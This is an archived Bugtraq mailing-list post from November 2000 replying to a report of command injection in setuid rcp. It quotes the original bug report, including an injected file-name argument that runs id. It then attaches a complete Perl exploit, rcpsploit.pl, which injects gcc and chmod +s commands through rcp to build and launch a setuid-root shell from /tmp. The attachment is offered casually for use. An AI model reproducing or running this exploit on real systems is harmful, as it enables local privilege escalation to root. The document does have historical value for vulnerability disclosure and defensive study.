[17742] in bugtraq
Re: possible bug in rcp...
daemon@ATHENA.MIT.EDU (tlabs)
Thu Nov 23 16:43:55 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="X1xGqyAVbSpAWs5A"
Content-Disposition: inline
Message-Id: <20001122140823.T35867@deceptively.shady.org>
Date: Wed, 22 Nov 2000 14:08:23 +0000
Reply-To: tlabs <tlabs@DECEPTIVELY.SHADY.ORG>
From: tlabs <tlabs@DECEPTIVELY.SHADY.ORG>
X-To: bugtraq@security-focus.com
To: BUGTRAQ@SECURITYFOCUS.COM
--X1xGqyAVbSpAWs5A
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
On Wed, Nov 22, 2000 at 09:11:20AM +1100, Andrew Griffiths wrote:
> Here is a possible bug in rcp; since I think it calls system(). I
> haven't had much time to play with this, because exama are coming up.
>
> It is negated because system() calls /bin/cp which with the newer
> versions of bash, it drops it's effective credientals...
>
> $ ls -alF `which rcp`
> -rwsr-xr-x 1 root root 14492 Jul 21 22:43
> /usr/sbin/rcp
>
> $ cd /tmp
> $ echo bla > bob
> $ rcp 'bob bobalina; /usrt/bin/id;' 127.0.0.1
> uid=500(andrewg) gid=500(andrewg) groups=500(andrewg)
> sh: 127.0.0.1: command not found.
>
> Now doing a quick ltrace - it doesn't remove ; and ` and other fun
> stuff. This could probably be exploited, on older bash bersions?
>
> It's up to you guys/girls now, I should start to study...
>
> Andrew Griffiths
just a wee exploit to help the boys and girls along innit
tlabs
--X1xGqyAVbSpAWs5A
Content-Type: application/x-perl
Content-Disposition: attachment; filename="rcpsploit.pl"
#!/usr/bin/perl -w
# exploits suid priveldges on rpc
# Not really tested this but hey
# works on redhat6.2
# not werk on freebsd4.1 stable
#
# bug discovered by
# Andrew Griffiths
#
# Exploit written by tlabs
# greetz to those that know me innit
#
# Please set your rcpfile
# this can be found by doing
#
# ls -alF `which rcp`
#
# have a lot of fun
$RCPFILE="/usr/bin/rcp" ;
# configure above innit
sub USAGE
{
print "$0\nWritten by Tlabs\n" ;
exit 0 ;
}
if ( ! -u "$RCPFILE" )
{
printf "rcp is not suid, quiting\n" ;
exit 0;
}
open(TEMP, ">>/tmp/shell.c")|| die "Something went wrong: $!" ;
printf TEMP "#include<unistd.h>\n#include<stdlib.h>\nint main()\n{" ;
printf TEMP " setuid(0);\n\tsetgid(0);\n\texecl(\"/bin/sh\",\"sh\",0);\n\treturn 0;\n}\n" ;
close(TEMP);
open(HMM, ">hey")|| die "Something went wrong: $!";
print HMM "Sploit written by tlabs, thanks to Andrew Griffiths for the bug report" ;
close(HMM);
system "rcp 'hey geezer; gcc -o /tmp/shell /tmp/shell.c;' localhost 2> /dev/null" ;
system "rcp 'hey geezer; chmod +s /tmp/shell;' localhost 2> /dev/null" ;
unlink("/tmp/shell.c");
unlink("hey");
unlink("geezer");
printf "Ok, too easy, we'll just launch a shell, lets hope shit went well innit:)\n" ;
exec '/tmp/shell' ;
--X1xGqyAVbSpAWs5A--
